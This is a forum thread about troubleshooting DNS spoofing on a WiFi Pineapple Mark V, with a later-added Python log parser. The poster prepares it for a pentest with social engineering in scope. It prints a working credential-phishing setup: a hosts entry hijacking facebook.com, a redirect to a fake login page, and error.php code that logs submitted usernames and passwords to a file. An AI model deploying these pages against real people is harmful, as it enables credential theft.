Scout32 Posted March 23, 2014

Hey guys, I just received my new Mark V a few days ago (upgraded from the Mark IV) and I was wondering if anyone else was having issues with DNSSpoof working? The 2GB SD card that shipped with the MK V was corrupt, so I had to download the latest (at the time it was 1.1.0) firmware to my own 8GB SD card. After that it flashed without a hitch. When I SSHed into the pineapple I noticed there was no redirect.php or error.php in /www/, or anywhere else on the MK V for that matter. So I checked the index.html and compared it to the one from the MK IV and they're completely different. Is the MK V handling dnsspoof differently now than the MK IV? I'm going to use my old redirect.php and error.php and try it out, but I was just curious if anyone else had this "issue", or if anyone knows if the MK V is handling dnsspoof differently now.

MK V index.html that came on my pineapple is:

    <HTML>
    <BODY>
    <SCRIPT>
    if ( window.top==window.self ) {
    document.write('<iframe src=http://www.google.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.facebook.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.twitter.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.hotmail.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.gmail.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.yahoo.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.paypal.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.live.com style="display:none;"></iframe>');
    document.write('<iframe src=http://www.linkedin.com style="display:none;"></iframe>');
    }
    </SCRIPT>
    </BODY>
    </HTML>

The MK IV index.html was simply:

    <html>
    <head>
    <meta http-equiv="REFRESH" content="0;url=redirect.php">
    </head>
    <body>
    </body>
    </html>

Very different. The only other file in /www/ is ncsi.txt and a directory /library/ (within that directory is /test/success.html which is just a simple one-liner like the MK IV index.html, just without "REFRESH").

Thanks in advance for any responses/dialog.

-Scout
Scout32 Posted March 23, 2014 (Author)

UPDATE: The old MK IV index.html, redirect.php, and error.php do not work - and neither does dnsspoof. Not sure if it's a bug or what, but this feature isn't really working like it has in the past on the MK IV. I'm testing this on my home network. Firmware version is 1.1.0. I'm also using the MK V in client mode on wlan1 connected to my home AP, and wlan0 is up for clients to connect to my MK V. I turn dnsspoof on via the "configuration" tile, and it's also available to enable on the dnsspoof tile. I also confirmed I have an internet connection.

My hosts file is:

    172.16.42.1 *facebook.com

My index.php file is:

    <html>
    <head>
    <meta http-equiv="REFRESH" content="0;url=redirect.php">
    </head>
    <body>
    </body>
    </html>

My redirect.php is:

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "facebook")) {
        header('Location: facebook.html');
    }
    ?>

I have "facebook.html" in /sd/www/facebook.html and a symlink in /www/ pointing to that file (that's how I had my MK IV).

My error.php is:

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);
        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
        $filed = @fopen("/sd/logs/phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
    }
    ?>
    <html><body>
    <h1>503 Service Unavailable</h1>
    </body></html>

My dnsspoof log shows activity:

    dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1]
    172.16.42.159.9964 > 172.16.42.1.53: 27677+ A? facebook.com
    172.16.42.159.37718 > 172.16.42.1.53: 55323+ A? www.facebook.com
    172.16.42.159.12724 > 208.67.222.222.53: 34488+ A? facebook.com
    172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com
    172.16.42.159.12164 > 172.16.42.1.53: 44409+ A? www.facebook.com
    172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com

I wonder if OpenDNS is the problem? I'm not sure if this is an error with dnsspoof, OpenDNS, or an error on my part (although this is how I had my MK IV set up and it worked flawlessly). I'd like to get this issue figured out as I have a pentest coming up mid April that has on-site social engineering in scope. I'd like to employ this MK V in some fashion during that engagement. I could also use the MK IV, but it was a HUGE p.i.t.a. since I was never able to get USB support for a powered hub (bought the HakShop one, plus 5 other powered hubs and they never worked as they should, so I couldn't get a second radio up AND have my USB with infusions installed at the same time).

Thanks in advance,

-Scout
thesugarat Posted March 23, 2014

Scout,

As for the Mark 4 I'm not entirely sure what you were trying to do but, I used a non-powered USB hub and had both USB drive and a second Alfa working...

As for the dnsspoofing on the Mark 5 it does work and you are correct it is different. Have you installed the dnsspoof infusion? Have you installed the RandomRoll infusion? Have a look under the hood at the files that make RandomRoll tick and you'll see what it's doing and where. Also, you could just turn it on and then have a look at the index, redirect and error.php files it creates. SSH in and look at the edited versions and that will give you an idea of how it's all interconnected. Just suggestions really.
Scout32 Posted March 23, 2014 (Author)

Thanks for the reply thesugarat. Yeah, I tried powered & non-powered hubs with my MK IV and I wasn't able to get them to work. Or, I should say, I wasn't able to get everything to work at once using a hub. If I used a USB hub, it would recognize the Alfa for only a short time but not the SD card housing my infusions. To me, that was a power issue, however, I tested the MK IV setup with both DC and battery and had the same results. I was mainly trying to use the Alfa as a second radio to connect to an AP - which is mainly why I got the MK V.

When I first turned dnsspoof on, there was no redirect or error php pages - and for me they didn't get created by enabling dnsspoof. I could only directly access index.php via the web by browsing to 172.16.42.1:8080/index.php.

Thanks for the tip on the RandomRoll infusion, I'll install it and take a look at how that one works. I didn't install it because it was one I didn't think I'd use. I'll definitely take a look at it. Thanks again!

Scout.
Scout32 Posted March 23, 2014 (Author) (edited)

Ok... so that failed. I installed the RandomRoll module, started dnsspoof, went to browse to www.google.com and the same thing happened; "This web page is not available" (Chrome). I think this is an issue with dnsspoof itself. Also, RandomRoll deleted my original index.html, redirect.php, and error.php (which I expected) - replacing them with JUST index.php in my /www/ directory. No redirect.php, no error.php, anywhere. The redirect.php tab in dnsspoof is now also blank. Pinging google.com as a 'target' with dnsspoof/RandomRoll enabled shows the pineapple (obviously). SSHing into the pineapple and pinging google.com shows the correct DNS resolution for google. There is a clear disconnect with requests while dnsspoof is running. Also, this redirect.php and error.php is interesting and they clearly aren't being created for me.

-Scout

EDIT: I also noticed the newly created index.php file has a broken html tag in it? It just has a closing </html> tag randomly put at the end of the php... thought that was odd. Further exploring the files with the infusion, I did find "redirect.orig" and "error.orig". Not sure why they never changed to .php, but I'll give that a shot and see how it goes.

Edited March 23, 2014 by Scout32
thesugarat Posted March 23, 2014

Well if you started dnsspoof manually and then went to the RandomRoll infusion and started it up that's incorrect.... The RandomRoll infusion sets everything up for you including turning on dnsspoof. But you have to select and apply the Rolls you want to see then hit start. Once you've done that, try to access any website that is not https and you should get Rolled. If that is working you can then ssh in and poke around at the files. Try the RandomRoll folder, I seem to remember it sets up symlinks to files in its directory.
Scout32 Posted March 23, 2014 (Author)

Ok, thanks for the suggestion. Am I correct in assuming there should have been a default redirect.php and error.php in /www/ that shipped with the Pineapple? I'm also not sure why the default index.php page has the php extension, as there is no php in it, just HTML and JS which loads a ton of hidden iframes.

So here's what's going on from start to finish. My network info tab shows my route as:

    Destination    Gateway        <...snip...>    Iface
    default        192.168.2.1                    wlan1
    172.16.42.0    *                              br-lan
    192.168.2.0    *                              wlan1

I have an internet connection through wlan1 and am accepting hosts on wlan0. Dnsspoof shows disabled in the Configuration tile and the dnsspoof tile. I then go to the RandomRoll tile, select my "rolls", click the "Apply Selected Rolls" button, confirm the popup, then click the "Start RandomRoll" button. The tile reports RandomRoll has been started. I attempt to browse to www.google.com and I get "This webpage is not available". I go back to the pineapple WUI and check the RandomRoll Log Output, which shows:

    dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1]
    172.16.42.159.8396 > 172.16.42.1.53: 33684+ A? www.google.com
    172.16.42.159.8396 > 208.67.222.222.53: 33684+ A? www.google.com
    172.16.42.159.11371 > <...snip...rinse and repeat...snip...>

208.67.222.222 is OpenDNS. Why is this request going out to OpenDNS and not being handled by the pineapple?

SSHing into the pineapple, I see a newly created symlink to index.php, and now (didn't show before because I guess I was invoking dnsspoof incorrectly) rickroll.php and rcmroll.php (the two 'rolls' I picked). Now my question is, why the eff aren't these being called?

Here's the index.php created by RandomRoll:

    <?php
    //Cache Control
    header("Cache-Control: no-cache, must-revalidate");
    header("Expires: Sat, 26 Jul 1997 05:00:00");
    ?>
    <?php
    //Thanks newbi3 for fixing my shitty php ;)
    $loop = 0;
    // note: this glob also matches /www/index.php itself, not only the roll pages
    foreach(glob("/www/*.php") as $roll){
        $rolls[$loop] = $roll;
        //[debug] echo " $roll ";
        $loop++;
    }
    $element = rand(0, count($rolls)-1);
    require($rolls[$element]);
    ?>

Reading the code, it should call one of the two rolls - but it doesn't. I'm also looking at the code for the rolls and there's nothing that stands out to me as an issue. Does any of this look familiar? Did your pineapple (or anyone else's) come with error.php and redirect.php already in /www/? The MK IV did, which is why I'm confused as to why this one didn't. I'm also confused why index.php has no php code and just loads iframes for a bunch of sites like google, facebook, and twitter. Do you, or anyone else that could chime in, have an example of index.php, redirect.php, and error.php that is working for you?

I'm not sure what the deal is really. I'm assuming this functionality should work out of the box and not require this much jacking around with. The MK IV worked for me with no issues. I'm almost wondering if an install was corrupt or dnsspoof didn't install correctly. Frustrating when you just want it to work. I don't mind tinkering with things, but functionality that should just work, I'm not too happy messing around with. Anyway, I'm going to mess with this till it works and I might just uninstall and reinstall to see if that helps.

Thanks for the advice, I appreciate all the help.

-Scout
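The dnsspoof log lines quoted in the two posts above are the only evidence of what the Pineapple saw, so here is an added Python example (not from this thread or from the RandomRoll infusion) that parses that log format and tells apart queries the client sent to the Pineapple's resolver from queries sent straight to an upstream resolver such as 208.67.222.222, which dnsspoof was never positioned to answer. The fnmatch-style matching of hosts-file patterns like *facebook.com is an assumption, and the sample log and hosts file are constructed from the lines posted above.

```python
import re
from fnmatch import fnmatch

# Constructed sample: the dnsspoof output and hosts file quoted in the thread.
SAMPLE_LOG = """\
dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1]
172.16.42.159.9964 > 172.16.42.1.53: 27677+ A? facebook.com
172.16.42.159.37718 > 172.16.42.1.53: 55323+ A? www.facebook.com
172.16.42.159.12724 > 208.67.222.222.53: 34488+ A? facebook.com
172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com
172.16.42.159.12164 > 172.16.42.1.53: 44409+ A? www.facebook.com
172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com
"""
SAMPLE_HOSTS = "172.16.42.1 *facebook.com\n"
LOCAL_RESOLVER = "172.16.42.1"  # the Pineapple's br-lan address

# One dnsspoof query line: "src.sport > dst.dport: id+ TYPE? name"
LINE_RE = re.compile(r"^(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
                     r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
                     r"(?P<qid>\d+)\+? (?P<qtype>\w+)\? (?P<qname>\S+)$")

def parse_dnsspoof_log(text):
    """One dict per query line; the 'listening on' banner and junk are skipped."""
    return [m.groupdict() for m in (LINE_RE.match(l) for l in text.splitlines()) if m]

def spoof_target(qname, hosts_text):
    """IP that a dnsspoof hosts entry ('IP pattern') maps qname to, or None.
    Assumption: patterns are fnmatch-style globs, so *facebook.com covers subdomains."""
    for line in hosts_text.splitlines():
        parts = line.split()
        if len(parts) == 2 and fnmatch(qname, parts[1]):
            return parts[0]
    return None

def classify_queries(log_text, hosts_text, local_resolver=LOCAL_RESOLVER):
    """Label each query: 'spoofable' only if the client asked the Pineapple AND the
    name has a hosts entry; a query sent straight upstream was never dnsspoof's to answer."""
    report = []
    for q in parse_dnsspoof_log(log_text):
        if q["dst"] != local_resolver:
            status = "bypassed-local-resolver"
        elif spoof_target(q["qname"], hosts_text):
            status = "spoofable"
        else:
            status = "no-hosts-entry"
        report.append((q["qname"], q["dst"], status))
    return report
```

Run over the sample, half of the lookups carry the "bypassed-local-resolver" label, which is the symptom the thread is chasing: the client is allowed to reach an upstream resolver directly, so those answers arrive from OpenDNS rather than from the Pineapple.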
thesugarat Posted March 23, 2014

I've got all three in the www by default... I would definitely suggest you reflash the firmware.

Reading the index.php that RandomRoll creates... "foreach(glob("/www/*.php") as $roll){" I'm pretty sure that section right there is where it calls out the Rolls... When you select the rolls and turn them on I believe a symlink is created for them in the /www/ folder and the *.php portion catches all of them that were created and the rest of it randomizes it...

You only need to change the redirect.php if you plan on phishing only specific sites. So I can't help you with that one. I either use Random Roll or the Pineapple Surprise and with both of them you just change the hosts to 172.16.42.1 * to send all sites to the internal server.

I'm pretty sure the OpenDNS is one of the default dns servers that is there under the hood. It has been mentioned in other posts.
Scout32 Posted March 24, 2014 (Author)

Cool thanks. Yeah I ended up just scrapping everything and flashing Firmware 1.1.1. I definitely think something went haywire during the flashing process of 1.1.0, or maybe dnsspoof installation. Either way, the reflash to 1.1.1 did the trick and everything is working. I immediately saw index.php, redirect.php, and error.php all in /www/ so something clearly happened in the previous firmware flash for me. That php code snippet should (and I'm sure would now) call the selected random rolls. I probably won't be installing RandomRoll, even though it looks like a pretty fun module, because my testing will be more focused on user awareness than Nyan Cat... although that would be pretty hilarious with some of my clients ;).

Thanks again for the assistance. I'm attributing the issue to a bad flash.

-Scout